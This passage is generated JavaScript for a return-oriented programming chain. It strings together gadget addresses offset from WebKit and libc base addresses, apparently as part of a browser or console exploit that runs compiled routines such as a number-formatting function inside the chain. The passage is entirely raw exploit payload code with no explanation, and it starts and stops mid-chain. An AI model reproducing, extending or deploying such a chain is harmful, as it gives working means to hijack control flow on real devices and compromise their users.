webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+274080, //L5185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5185:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5187:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+274240, //L5190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+274208, //L5188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+274224, //L5189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5188:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5189:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5190:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+274320, //L5191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5191:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5193:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+274440, //L5196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+274424, //L5194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5194:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5196:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+274584, //L5199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+274552, //L5197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+274568, //L5198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5197:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5198:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5199:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L5201:
ropchain+274688, //L5200
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+192784, //__out_rev
//L5200:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967232, 4294967295]); // -0x40
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+274816, //L5202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+274848, //L5204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+274832, //L5203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5202:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5203:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5204:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+274952, //L5205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+274968, //L5206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L5205:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5206:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+275088, //L5207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+275072, //L5208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L5208:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L5207:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+275176, //L5210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+275160, //L5209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5209:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5210:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+275280, //L5211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+275296, //L5212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L5211:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5212:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+275416, //L5213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+275400, //L5214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L5214:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L5213:
db([0, 0]); // 0x0
//__ntoa_long:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+275488, //L5216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L5216:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+275552, //L5218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L5218:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+275640, //L5220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5219:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5220:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5221:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+275720, //L5222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5222:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5224:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L5226:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+275880, //L5229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+275864, //L5227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5227:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5229:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+276040, //L5233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+275992, //L5230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+276008, //L5231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5230:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5231:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5232:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5233:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+276176, //L5235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+276192, //L5236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+276160, //L5234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5234:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5235:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5236:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+276304, //L5238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+276352, //L5241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+276320, //L5239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5238:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5239:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5240:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5241:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+276464, //L5242+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+276456, //L5242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5242:
db([0, 0]); // 0x0
set_gadgets([
ropchain+276480, //L5242+24
ropchain+277544, //L5237
libc_base+764760, //pop rsi
ropchain+276520, //L5243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5243:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5245:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+276640, //L5248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+276624, //L5246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5246:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5248:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+276816, //L5251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+276832, //L5252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+276784, //L5249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+276800, //L5250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5249:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5250:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5251:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5252:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+276928, //L5254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+276912, //L5253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5253:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5254:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5255:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5256:
db([4, 0]); // 0x4
set_gadget(libc_base+763368,); //pop rcx
//L5257:
db([4, 0]); // 0x4
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+277136, //L5259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5258:
db([4294967295, 4294967295]); // 0xffffffffffffffff
set_gadget(libc_base+759608,); //pop rax
//L5259:
db([0, 0]); // 0x0
set_gadgets([
libc_base+847417, //xor rax, rsi ; sub rax, rsi
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+277200, //L5261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5261:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+277256, //L5262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5262:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+277392, //L5266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+277376, //L5265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5264:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5265:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+277456, //L5267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5267:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5269:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+277536, //L5270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5270:
db([0, 0]); // 0x0
//L5237:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+277584, //L5272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5272:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5274:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+277704, //L5277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+277688, //L5275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5275:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+277880, //L5280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+277896, //L5281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+277848, //L5278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+277864, //L5279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5278:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5279:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5280:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5281:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+277992, //L5283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+277976, //L5282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5282:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5283:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5284:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5285:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L5286:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+278192, //L5288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5288:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+278248, //L5289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5289:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+278384, //L5293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+278368, //L5292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5291:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5292:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5293:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+278504, //L5296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+278472, //L5294
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5294:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5295:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5296:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+278640, //L5298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+278656, //L5299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+278624, //L5297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5297:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5298:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5299:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+278816, //L5304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+278832, //L5305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+278768, //L5301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5301:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5302:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L5303:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L5304:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5305:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+278952, //L5306+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+278944, //L5306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5306:
db([0, 0]); // 0x0
set_gadgets([
ropchain+278968, //L5306+24
ropchain+279368, //L5300
libc_base+764760, //pop rsi
ropchain+279008, //L5307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5307:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5309:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+279128, //L5312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+279112, //L5310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5310:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5312:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+279272, //L5315
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+279288, //L5316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+279240, //L5313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5313:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5314:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L5315:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5316:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+279360, //L5317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5317:
db([0, 0]); // 0x0
//L5300:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+279488, //L5320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+279504, //L5321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+279472, //L5319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5319:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5320:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5321:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+279616, //L5323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+279664, //L5326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+279632, //L5324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5323:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5324:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5325:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5326:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+279776, //L5327+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+279768, //L5327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5327:
db([0, 0]); // 0x0
set_gadgets([
ropchain+279792, //L5327+24
ropchain+291080, //L5322
//L5328:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5329:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5331:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+279928, //L5334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+279912, //L5332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5332:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5334:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+280072, //L5337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+280040, //L5335
